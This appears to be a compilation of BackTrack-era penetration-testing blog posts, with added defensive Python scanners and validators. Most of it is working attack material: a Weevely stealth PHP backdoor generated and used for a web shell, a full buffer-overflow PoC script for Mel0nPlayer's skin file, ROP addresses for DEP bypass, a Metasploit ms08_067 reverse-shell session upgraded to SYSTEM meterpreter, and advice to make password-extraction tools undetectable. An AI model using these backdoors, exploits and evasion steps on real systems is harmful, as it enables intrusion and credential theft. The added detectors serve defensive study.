MSF PostgreSQL Problem on BT5

If you are reading this post then I bet you have the same problem as me. When I tried to run msfconsole on my BT5 I got this error:

[-] Failed to connect to the database:
could not connect to server: Connection refused
Is the server running on host "127.0.0.1" and accepting
TCP/IP connections on port 7175?

It seems MSF could not connect to the Postgres database server. I tried installing the Postgres server on my BT5 and still had no luck, so I started searching the internet and found the fix for this problem. Here is the solution (it removes the stale PID and socket files left behind by a previous instance and starts the server again):

rm /opt/framework3/postgresql/data/postmaster.pid
rm /opt/framework3/postgresql/.s.PGSQL.7175
rm /opt/framework3/postgresql/.s.PGSQL.7175.lock
/etc/init.d/framework-postgres start
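An added check (not part of the original post) that makes the cleanup above safe: it reads the PID from postmaster.pid and only reports the pid and socket files as removable when that process is gone, so a running server is never clobbered. The data directory, port and socket directory are parameters (defaults match the /opt/framework3/postgresql layout), and the fixture with a dead PID is constructed for the demo.

```python
import errno
import os
import subprocess
import sys
import tempfile


def pid_is_alive(pid):
    """True if a process with this PID exists; signal 0 probes without sending."""
    try:
        os.kill(pid, 0)
    except OSError as exc:
        return exc.errno != errno.ESRCH    # EPERM means it exists but is not ours
    return True


def read_postmaster_pid(pidfile):
    """postmaster.pid starts with the postmaster's PID; None if absent/garbled."""
    try:
        with open(pidfile) as fh:
            return int(fh.readline().strip())
    except (IOError, OSError, ValueError):
        return None


def stale_lock_files(data_dir, port, socket_dir=None):
    """Return the lock files that are safe to delete, or [] if the server runs.

    Checks postmaster.pid in data_dir plus .s.PGSQL.<port> and
    .s.PGSQL.<port>.lock in socket_dir (default: the parent of data_dir, which
    is where the BT5 framework3 layout above keeps them).
    """
    if socket_dir is None:
        socket_dir = os.path.dirname(os.path.abspath(data_dir))
    pidfile = os.path.join(data_dir, "postmaster.pid")
    pid = read_postmaster_pid(pidfile)
    if pid is not None and pid > 0 and pid_is_alive(pid):
        return []                          # live postmaster: do not touch anything
    candidates = [
        pidfile,
        os.path.join(socket_dir, ".s.PGSQL.%d" % port),
        os.path.join(socket_dir, ".s.PGSQL.%d.lock" % port),
    ]
    return [p for p in candidates if os.path.lexists(p)]


def make_stale_fixture(port=7175):
    """Constructed layout: postmaster.pid names a child process that has exited."""
    root = tempfile.mkdtemp()
    data_dir = os.path.join(root, "data")
    os.mkdir(data_dir)
    child = subprocess.Popen([sys.executable, "-c", "pass"])
    child.wait()                           # reaped, so its PID no longer exists
    with open(os.path.join(data_dir, "postmaster.pid"), "w") as fh:
        fh.write("%d\n%s\n" % (child.pid, data_dir))
    for name in (".s.PGSQL.%d" % port, ".s.PGSQL.%d.lock" % port):
        open(os.path.join(root, name), "w").close()
    return data_dir


def mark_running(data_dir):
    """Overwrite postmaster.pid with our own PID to simulate a live server."""
    with open(os.path.join(data_dir, "postmaster.pid"), "w") as fh:
        fh.write("%d\n%s\n" % (os.getpid(), data_dir))


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else make_stale_fixture()
    for path in stale_lock_files(target, 7175):
        print("stale:", path)
```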

Then, try to run the msfconsole again.

NOTICE:  CREATE TABLE will create implicit sequence "api_keys_id_seq" for serial column "api_keys.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "api_keys_pkey" for table "api_keys"
NOTICE:  CREATE TABLE will create implicit sequence "macros_id_seq" for serial column "macros.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "macros_pkey" for table "macros"
NOTICE:  CREATE TABLE will create implicit sequence "cred_files_id_seq" for serial column "cred_files.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "cred_files_pkey" for table "cred_files"
NOTICE:  CREATE TABLE will create implicit sequence "listeners_id_seq" for serial column "listeners.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "listeners_pkey" for table "listeners"
NOTICE:  CREATE TABLE will create implicit sequence "nexpose_consoles_id_seq" for serial column "nexpose_consoles.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "nexpose_consoles_pkey" for table "nexpose_consoles"
NOTICE:  CREATE TABLE will create implicit sequence "profiles_id_seq" for serial column "profiles.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "profiles_pkey" for table "profiles"


=[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ -- --=[ 732 exploits - 374 auxiliary - 82 post
+ -- --=[ 227 payloads - 27 encoders - 8 nops
=[ svn r13728 updated today (2011.09.13)

msf > quit

This creates the database structure. Run msfconsole once again to make sure it connects to the database correctly:


=[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ -- --=[ 732 exploits - 374 auxiliary - 82 post
+ -- --=[ 227 payloads - 27 encoders - 8 nops
=[ svn r13728 updated today (2011.09.13)

msf >

Nice! Good luck to you.

Silent Backdoor with Weevely

Ever thought of reaching your backdoor undetected? Well, maybe not all web administrators examine their PHP files? Weevely is the answer. Just follow these steps (I was doing this on Backtrack 5):

root@bt:~# cd /pentest/backdoors/web/weevely
root@bt:/pentest/backdoors/web/weevely# ./main.py -g -p bD_p4ss -o bd.php

Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/

+ Backdoor file 'bd.php' created with password 'bD_p4ss'.
root@bt:/pentest/backdoors/web/weevely#

Where:
-p = the password used to access the backdoor
-g = generate a new "encrypted" PHP file (it doesn’t actually encrypt the file, it encodes it)
-o = the output file

Now you have a new “encrypted” PHP file called bd.php. So how does it work?
You put this script in the web server's document root.

Now take a look at what happens when I put the script there and access it.

root@bt:/pentest/backdoors/web/weevely# ./main.py -t -u http://10.10.10.10/bd.php -p bD_p4ss

Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/

+ Using method 'system()'.
+ Retrieving terminal basic environment variables .

[www-data@gw /var/www] id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[www-data@gw /var/www] pwd
/var/www
[www-data@gw /var/www]

Voila! We’ve got a non-interactive shell!
Weevely can also easily be deployed inside any existing PHP file, but you should pay attention to where the script gets injected, be creative 🙂
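The post's own point is that the dropped file is encoded, not encrypted, so PHP itself has to undo the encoding at request time. This added example (not from the post or the Weevely project) scans a web root for PHP files that carry that shape: a decoder such as base64_decode or str_rot13 feeding eval, a dynamic $f() call, a preg_replace /e, or a long base64 run. These are generic indicators of encoded PHP, not a Weevely signature; the sample files are constructed.

```python
import os
import re
import tempfile

# Functions that undo an encoding at request time, and functions that turn the
# decoded result into code or commands.
DECODERS = re.compile(r"\b(base64_decode|str_rot13|gzinflate|gzuncompress|strrev)\s*\(", re.I)
EVALUATORS = re.compile(r"\b(eval|assert|create_function|system|passthru|shell_exec|exec)\s*\(", re.I)
PREG_E = re.compile(r"preg_replace\s*\(\s*['\"]/.*?/[a-z]*e[a-z]*['\"]", re.I | re.S)
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{80,}={0,2}")
DYNAMIC_CALL = re.compile(r"\$\w+\s*\(")          # $f(...) hides the callee's name


def score_php(source):
    """Return the list of indicator names that fire on one PHP source string."""
    findings = []
    if DECODERS.search(source) and EVALUATORS.search(source):
        findings.append("decoder feeding evaluator")
    if PREG_E.search(source):
        findings.append("preg_replace /e")
    if BASE64_RUN.search(source):
        findings.append("long base64 run")
    if DECODERS.search(source) and DYNAMIC_CALL.search(source):
        findings.append("dynamic call with decoder")
    return findings


def scan_webroot(root):
    """Map each PHP file (path relative to root) to its findings; clean files are omitted."""
    hits = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith((".php", ".phtml", ".php5")):
                continue
            full = os.path.join(dirpath, name)
            with open(full, "r", encoding="latin-1") as fh:   # read only, never executed
                findings = score_php(fh.read())
            if findings:
                hits[os.path.relpath(full, root).replace(os.sep, "/")] = findings
    return hits


# Constructed samples: one ordinary page and two files shaped like encoded droppers
# (the payloads only echo a string).
SAMPLES = {
    "index.php": "<?php echo 'hello'; $logo = base64_encode(file_get_contents('logo.png')); ?>",
    "uploads/cache.php": "<?php $p = base64_decode('ZWNobyAnaGknOw=='); eval($p); ?>",
    "inc/helper.php": "<?php $f = str_rot13('rpub'); $f('ok'); ?>",
}


def make_fixture():
    """Write SAMPLES under a temporary web root and return its path."""
    root = tempfile.mkdtemp()
    for rel, body in SAMPLES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for path, findings in sorted(scan_webroot(make_fixture()).items()):
        print(path, "->", ", ".join(findings))
```

Run it against /var/www on a box where the findings can be reviewed by hand; anything it flags still needs a human to read the file.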

Mel0nPlayer 1.0.11.x Denial of Service POC

Software Description

Mel0n Player is a well-known piece of software in Indonesia for playing music provided by the Melon portal (http://www.melon.co.id). It can play many music file types such as mp3, wav, wma, mp4 and others, either from files on your local computer or by streaming online from the Melon portal. Songs can also be downloaded to your local computer.

Vulnerable Information

The main program (IDMelonPlayer.exe) suffers from a buffer overflow when opening the p_about.ini file (note: p_about.ini is a configuration file that is part of the skin template; it holds the program information and is loaded from the menu (Menu → Information)). Adding extra bytes to part of the file (the Text section) gives an attacker the possibility of arbitrary code execution on a system with Melon Player installed.

This is just the POC; it will only crash the program.

How to reproduce the vulnerability

Just run this code, open MelonPlayer, go to Menu → Information → Boom!

#!/usr/bin/python

import os,sys,shutil,time

header=("""[MAIN]
MainStyle=SKIN
Resize=NO
Mask=YES
BGStyle=IMAGE
DefSize=0,0,427,136
Image=skin.bmp
Button=2
Slider=
Static=1
Text=4
Edit=
Combo=

[MAINBG]
TopLeft=145,389,6,21
TopCenter=153,389,11,21
TopRight=166,389,6,21
MiddleLeft=145,412,6,21
MiddleCenter=153,412,11,21
MiddleRight=166,412,6,21
BottomLeft=145,435,6,34
BottomCenter=153,435,11,34
BottomRight=166,435,6,34

[MAINMASK]
TopLeft=174,389,10,10
TopCenter=185,389,10,10
TopRight=196,389,10,10
MiddleLeft=185,389,10,10
MiddleCenter=185,389,10,10
MiddleRight=185,389,10,10
BottomLeft=174,400,10,10
BottomCenter=185,389,10,10
BottomRight=196,400,10,10

[BUTTON_1]
Name=??
ID=1001
ResizeStyle=TOP_LEFT
Tooltip=
CheckBox=FALSE
Position=410,4,13,13
NormalRect=223,389,13,13
OverRect=238,389,13,13
DownRect=253,389,13,13
DisabledRect=223,389,13,13
MaskRect=2000,0,13,13

[BUTTON_2]
Name=??
ID=1002
ResizeStyle=TOP_LEFT
Tooltip=
CheckBox=FALSE
Position=173,105,80,20
NormalRect=0,763,80,20
OverRect=0,763,80,20
DownRect=81,763,80,20
DisabledRect=162,763,80,20
MaskRect=2000,0,80,20

[STATIC_1]
Name=???_??
ID=2001
Position=20,31,72,84
TopLeft=14,478,72,84
TopCenter=
TopRight=
MiddleLeft=
MiddleCenter=
MiddleRight=
BottomLeft=
BottomCenter=
BottomRight=

[TEXT_1]
Name=popup Name sdw
ID=3701
Position=2,2,420,14
Text=MelOn Player
Font=Arial
FontSize=12
FontBold=
Align=CENTER
FontColor=0,0,0
""")

footer=("""
[TEXT_3]
Name=????
ID=3703
Position=104,50,243,14
Text=Melon Player Version 1.0.0.101102
Font=Arial
FontSize=12
FontBold=
Align=
FontColor=0,0,0

[TEXT_4]
Name=Copyright
ID=3704
Position=104,72,303,14
Text=Copyright PT. Melon Indonesia. All Right Reserved.
Font=Arial
FontSize=12
FontBold=
Align=
FontColor=0,0,0
""")

filename="p_about.ini"
splash=os.path.abspath(filename)
skindir="C:\\Program Files\\MelonPlayerIDSkin"	# backslashes were lost in extraction; the separator between the player folder and Skin is unknown, adjust to the installed Skin directory

junk = "A" * 3000

buggy=("""
[TEXT_2]
Name=popup Name
ID=3702
Position=3,3,420,14
Text="""+junk+ """
Font=Arial
FontSize=12
FontBold=
Align=CENTER
FontColor=170,170,170\r\n""")

banner=("""
[*] MelOnPlayer 1.0.11.x Denial of Service POC
[*] modpr0be[at]spentera[dot]com.
[*] thanks a lot: cyb3r.anbu | otoy
=====================================================
""")

if os.name == 'nt':
	if os.path.isdir(skindir):
		try:
			out=open(filename,'w')	# create the file only once we know we are on Windows with the player installed
			out.write(header+buggy+footer)
			out.close()
			print banner
			print "[*] Creating the malicious .ini file.."
			time.sleep(2)
			print "[*] Malicious file (POC)",filename,"created.."
			print "[*] Path:",splash
			shutil.copy2(splash,skindir)	# the About dialog loads p_about.ini from the Skin directory
			print "[*] File",filename,"has been copied to",skindir
		except IOError:
			print "[-] Could not write to destination folder, check permission.."
			sys.exit()
	else:
		print "[-] Could not find Skin directory, is MelOn Player installed?"
		sys.exit()
else:
	print "[-] Please run this script on Windows."
	sys.exit()

Working exploit can be found here:
https://github.com/modpr0be/exploit-dev/tree/master/exploit-repo/melonplayer
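The crash comes from one oversized Text= value in a [TEXT_n] section, so a skin .ini can be validated before a native parser with fixed-size buffers ever reads it. This added example (not from the post) parses the [SECTION] / key=value layout shown above, reports every value longer than a limit, and checks that the Text= count in [MAIN] matches the number of [TEXT_n] sections; the 256-byte limit is an assumption (the player's real buffer size is not given), and the sample files are constructed.

```python
MAX_VALUE = 256   # assumed limit; the player's real buffer size is not known


def parse_skin_ini(text):
    """Parse the [SECTION] / key=value layout of the skin .ini shown above.

    Returns {section: [(key, value), ...]} keeping order and duplicates; a
    key=value line outside any section or a line without '=' is rejected.
    """
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, [])
            continue
        if current is None or "=" not in line:
            raise ValueError("malformed line: %r" % raw[:40])
        key, _, value = line.partition("=")
        sections[current].append((key.strip(), value))
    return sections


def oversized_values(text, limit=MAX_VALUE):
    """List (section, key, length) for every value longer than `limit` bytes."""
    found = []
    for section, items in parse_skin_ini(text).items():
        for key, value in items:
            size = len(value.encode("latin-1", "replace"))
            if size > limit:
                found.append((section, key, size))
    return found


def declared_text_count_matches(text):
    """[MAIN] Text= declares how many [TEXT_n] sections exist; verify it."""
    sections = parse_skin_ini(text)
    declared = dict(sections.get("MAIN", [])).get("Text", "0")
    present = sum(1 for name in sections if name.startswith("TEXT_"))
    return int(declared or 0) == present


# Constructed samples in the layout of p_about.ini: a sane [TEXT_2] and one
# carrying the 3000-byte Text= value the PoC writes.
TEMPLATE = (
    "[MAIN]\nMainStyle=SKIN\nText=2\n\n"
    "[TEXT_1]\nName=popup Name sdw\nID=3701\nPosition=2,2,420,14\n"
    "Text=MelOn Player\nFont=Arial\nFontSize=12\n\n"
    "[TEXT_2]\nName=popup Name\nID=3702\nPosition=3,3,420,14\n"
    "Text=%s\nFont=Arial\nFontSize=12\nAlign=CENTER\nFontColor=170,170,170\n"
)
BENIGN_INI = TEMPLATE % "About"
MALICIOUS_INI = TEMPLATE % ("A" * 3000)


if __name__ == "__main__":
    for label, ini in (("benign", BENIGN_INI), ("malicious", MALICIOUS_INI)):
        print(label, oversized_values(ini), declared_text_count_matches(ini))
```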

Useful Addresses When Dealing with ROP

I'm writing this down so I don't forget. These addresses can of course be looked up again, but it's nicer to have them here without searching again, right?!

A number of addresses used for ROP techniques, as follows:

VirtualAlloc()

Simply put, VirtualAlloc() allocates new memory. One of its parameters lets the new memory be made executable as well as readable and writable, so the main thing to get right with this function is the EXECUTE_READWRITE value.

On Windows XP SP3, VirtualAlloc() is at address 0x7C809AF1 (kernel32.dll), while on Windows 7 it is at 0x75C57A4F (kernel32.dll).

Info: http://msdn.microsoft.com/en-us/library/aa366887(VS.85).aspx

HeapCreate()

Creates a new memory heap that our shellcode can use. The function allocates a region in the virtual address space of the calling process.

This function only creates a private heap and marks it as executable. We still have to allocate memory in that heap (with HeapAlloc(), for example) and then copy the shellcode to that heap location (with memcpy(), for example).

Once the new heap memory is allocated, we can use memcpy() to copy our shellcode to the allocated heap and run it.

On XP SP3, HeapCreate is located at 0x7C812C56, also part of kernel32.dll. On Windows 7, HeapCreate is located at 0x75C5EDFF, part of KERNELBASE.dll.

Info: http://msdn.microsoft.com/en-us/library/aa366599(VS.85).aspx

SetProcessDEPPolicy()

For this function to work, DEP must be set to OptIn or OptOut; if it is AlwaysOn or AlwaysOff, this technique errors out or simply does not work. If the module is linked with /NXCOMPAT, the technique also fails. Likewise, it can only be used if the function has not already been called: IE8, for example, always calls it at startup, so the technique cannot be used there.

The good news is that this function needs only one parameter, which keeps the ROP chain fairly simple. The address of SetProcessDEPPolicy on Windows XP SP3 is 0x7C8622A4, and on Windows 7 it is 0x762B62E4; both are part of kernel32.dll.

Info: http://msdn.microsoft.com/en-us/library/bb736299(VS.85).aspx

NtSetInformationProcess()

This function makes memory executable, but it won't work if DEP is set to permanent AlwaysOn. The address on Windows XP SP3 is 0x7C90DC9E. It can only be used on Windows XP, Vista and 2003.

Info: http://uninformed.org/index.cgi?v=2&a=4

VirtualProtect()

The VirtualProtect function changes the access protection of memory in the calling process. The memory access protection constants can be seen here. On Windows XP SP3 the address is 0x7C801AD4, while on Windows 7 it can be found at 0x75C5F306. Both are part of kernel32.dll.

WriteProcessMemory()

On Windows XP SP3, WriteProcessMemory() is located at 0x7C802213 (kernel32.dll), and on Windows 7 at 0x75C744CF (kernelbase.dll). This function lets the attacker copy shellcode to another (executable) location so we can jump there and run it. While copying, the function makes sure the destination is marked writeable.

Info: http://packetstormsecurity.org/files/view/87883/Windows-DEP-WPM.txt

(Source: corelan.be)

Metasploit Meterpreter Command Shell Upgrade

Seeing is believing 🙂

root@bt:~# msfconsole

=[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 707 exploits - 359 auxiliary - 57 post
+ -- --=[ 225 payloads - 27 encoders - 8 nops
=[ svn r13065 updated today (2011.06.29)

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf exploit(ms08_067_netapi) > set lhost 192.168.96.1
lhost => 192.168.96.1
msf exploit(ms08_067_netapi) > set rhost 192.168.96.129
rhost => 192.168.96.129
msf exploit(ms08_067_netapi) > set lport 443
lport => 443
msf exploit(ms08_067_netapi) > exploit -z

[*] Started reverse handler on 192.168.96.1:443
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Command shell session 1 opened (192.168.96.1:443 -> 192.168.96.129:1094) at 2011-06-30 00:47:32 +0700
[*] Session 1 created in the background.
msf exploit(ms08_067_netapi) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 shell windows Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> 192.168.96.1:443 -> 192.168.96.129:1094

Good, the command shell is in the background now. What if we want to turn that existing command shell session into a meterpreter session? Re-exploit? No, forget about re-exploiting: Metasploit has a feature to upgrade a command shell session to a meterpreter session, look at the -u option. Let’s try that.

msf exploit(ms08_067_netapi) > sessions -h
Usage: sessions [options]

Active session manipulation and interaction.

OPTIONS:

-K Terminate all sessions
-c Run a command on the session given with -i, or all
-d Detach an interactive session
-h Help banner
-i Interact with the supplied session ID
-k Terminate session
-l List all active sessions
-q Quiet mode
-r Reset the ring buffer for the session given with -i, or all
-s Run a script on the session given with -i, or all
-u Upgrade a win32 shell to a meterpreter session
-v List verbose fields

msf exploit(ms08_067_netapi) > sessions -u 1

[*] Started reverse handler on 192.168.96.1:443
[*] Starting the payload handler...
[*] Command Stager progress - 1.66% done (1699/102108 bytes)
[*] Command Stager progress - 3.33% done (3398/102108 bytes)
[*] Command Stager progress - 4.99% done (5097/102108 bytes)
[*] Command Stager progress - 6.66% done (6796/102108 bytes)
[*] Command Stager progress - 8.32% done (8495/102108 bytes)
[*] Command Stager progress - 9.98% done (10194/102108 bytes)
[*] Command Stager progress - 11.65% done (11893/102108 bytes)
[*] Command Stager progress - 13.31% done (13592/102108 bytes)
[*] Command Stager progress - 14.98% done (15291/102108 bytes)
[*] Command Stager progress - 16.64% done (16990/102108 bytes)
[*] Command Stager progress - 18.30% done (18689/102108 bytes)
[*] Command Stager progress - 19.97% done (20388/102108 bytes)
[*] Command Stager progress - 21.63% done (22087/102108 bytes)
[*] Command Stager progress - 23.29% done (23786/102108 bytes)
[*] Command Stager progress - 24.96% done (25485/102108 bytes)
[*] Command Stager progress - 26.62% done (27184/102108 bytes)
[*] Command Stager progress - 28.29% done (28883/102108 bytes)
[*] Command Stager progress - 29.95% done (30582/102108 bytes)
[*] Command Stager progress - 31.61% done (32281/102108 bytes)
[*] Command Stager progress - 33.28% done (33980/102108 bytes)
[*] Command Stager progress - 34.94% done (35679/102108 bytes)
[*] Command Stager progress - 36.61% done (37378/102108 bytes)
[*] Command Stager progress - 38.27% done (39077/102108 bytes)
[*] Command Stager progress - 39.93% done (40776/102108 bytes)
[*] Command Stager progress - 41.60% done (42475/102108 bytes)
[*] Command Stager progress - 43.26% done (44174/102108 bytes)
[*] Command Stager progress - 44.93% done (45873/102108 bytes)
[*] Command Stager progress - 46.59% done (47572/102108 bytes)
[*] Command Stager progress - 48.25% done (49271/102108 bytes)
[*] Command Stager progress - 49.92% done (50970/102108 bytes)
[*] Command Stager progress - 51.58% done (52669/102108 bytes)
[*] Command Stager progress - 53.25% done (54368/102108 bytes)
[*] Command Stager progress - 54.91% done (56067/102108 bytes)
[*] Command Stager progress - 56.57% done (57766/102108 bytes)
[*] Command Stager progress - 58.24% done (59465/102108 bytes)
[*] Command Stager progress - 59.90% done (61164/102108 bytes)
[*] Command Stager progress - 61.57% done (62863/102108 bytes)
[*] Command Stager progress - 63.23% done (64562/102108 bytes)
[*] Command Stager progress - 64.89% done (66261/102108 bytes)
[*] Command Stager progress - 66.56% done (67960/102108 bytes)
[*] Command Stager progress - 68.22% done (69659/102108 bytes)
[*] Command Stager progress - 69.88% done (71358/102108 bytes)
[*] Command Stager progress - 71.55% done (73057/102108 bytes)
[*] Command Stager progress - 73.21% done (74756/102108 bytes)
[*] Command Stager progress - 74.88% done (76455/102108 bytes)
[*] Command Stager progress - 76.54% done (78154/102108 bytes)
[*] Command Stager progress - 78.20% done (79853/102108 bytes)
[*] Command Stager progress - 79.87% done (81552/102108 bytes)
[*] Command Stager progress - 81.53% done (83251/102108 bytes)
[*] Command Stager progress - 83.20% done (84950/102108 bytes)
[*] Command Stager progress - 84.86% done (86649/102108 bytes)
[*] Command Stager progress - 86.52% done (88348/102108 bytes)
[*] Command Stager progress - 88.19% done (90047/102108 bytes)
[*] Command Stager progress - 89.85% done (91746/102108 bytes)
[*] Command Stager progress - 91.52% done (93445/102108 bytes)
[*] Command Stager progress - 93.18% done (95144/102108 bytes)
[*] Command Stager progress - 94.84% done (96843/102108 bytes)
[*] Command Stager progress - 96.51% done (98542/102108 bytes)
[*] Command Stager progress - 98.15% done (100216/102108 bytes)
[*] Command Stager progress - 99.78% done (101888/102108 bytes)
[*] Sending stage (752128 bytes) to 192.168.96.129
[*] Command Stager progress - 100.00% done (102108/102108 bytes)
msf exploit(ms08_067_netapi) > [*] Meterpreter session 2 opened (192.168.96.1:443 -> 192.168.96.129:1095) at 2011-06-30 00:48:12 +0700

Well, a new meterpreter session is now on the session list 😉

msf exploit(ms08_067_netapi) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 shell windows Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> 192.168.96.1:443 -> 192.168.96.129:1094
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ XP_FDCC 192.168.96.1:443 -> 192.168.96.129:1095

msf exploit(ms08_067_netapi) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Nice feature, good job Metasploit team 😉

Some Documents of File Specifications/Formats

Here are some documents to help you understand some file formats/headers, for file format fuzzing purpose:

WAVE PCM soundfile format (RIFF)
https://ccrma.stanford.edu/courses/422/projects/WaveFormat/

ZIP File format specification
http://www.pkware.com/documents/casestudies/APPNOTE.TXT

MPEG File format
http://www.mpgedit.org/mpgedit/mpeg_format/mpeghdr.htm#MPEGTAG

GZip File format
http://www.gzip.org/zlib/rfc-gzip.html

SWF File format
http://the-labs.com/MacromediaFlash/SWF-Spec/SWFfileformat.html

TIFF File format
http://www.awaresystems.be/imaging/tiff/faq.html

EXIF File format
http://www.media.mit.edu/pia/Research/deepview/exif.html

ID3Tag File format (v.2.3.0)
http://www.id3.org/id3v2.3.0

PNG File format (v1.2)
http://www.libpng.org/pub/png/spec/1.2/PNG-Contents.html

PDF File format
http://www.printmyfolders.com/understanding-pdf

PLS/M3U File format
http://forums.winamp.com/showthread.php?threadid=65772
http://www.assistanttools.com/articles/pls_playlist_format.shtml (PLS)
http://www.assistanttools.com/articles/m3u_playlist_format.shtml (M3U)

RAR File format
http://www.win-rar.com/index.php?id=24&kb_article_id=162

(to be updated…)

Backtrack 5: How to install VMware Workstation 7.1.3

So I wanted to install VMware Workstation 7.1.3 on Backtrack 5, but there were errors after I ran the installer binary (e.g. ./VMware-Workstation-Full-7.1.3-324285.x86_64.bundle), so here’s the solution:

Prepare the Kernel

Look here: http://www.backtrack-linux.org/forums/backtrack-5-how-tos/40276-backtrack-5-how-prepare-kernel-sources-vmare-tools-drivers-etc.html

Download patch

http://communities.vmware.com/servlet/JiveServlet/download/2344-293321-1721368-58749/vmware-7.1.3-2.6.38-1-generic.patch

Patching

cd /usr/lib/vmware/modules/source
ls *.tar | xargs -n 1 tar xvf
patch -p1 < /path/to/patch/vmware-7.1.3-2.6.38-1-generic.patch
tar cf vmci.tar vmci-only
tar cf vsock.tar vsock-only
tar cf vmnet.tar vmnet-only
tar cf vmmon.tar vmmon-only
rm -rf vmci-only vsock-only vmnet-only vmmon-only

Compile Module

vmware-modconfig --console --install-all

Voila! VMware Workstation 7.1.3 is installed, and you can proceed to upgrade to the latest version. This patch applies only to VMware Workstation 7.1.3; for VMware Workstation 7.1.4 download this patch and follow the same steps.


Dump Windows System Info

When you are asked to collect all Windows system information such as the list of users, services, installed software and its versions, Windows update history, etc., you will probably want to look at these tools:

System Information Collector

SAM/Password Extractor

Note: If you are familiar with reverse engineering, making those HackTool/PUA tools undetectable is the best choice 😀

or

Use Metasploit and attack your target system. The Meterpreter payload contains lots of user scripts that can be useful for digging up system info. I suggest attacking Internet Explorer since it may not harm the running system/services.

J. Dravet wrote up various techniques for retrieving the passwords; of course it depends on your goal, so use it wisely.

Good luck 🙂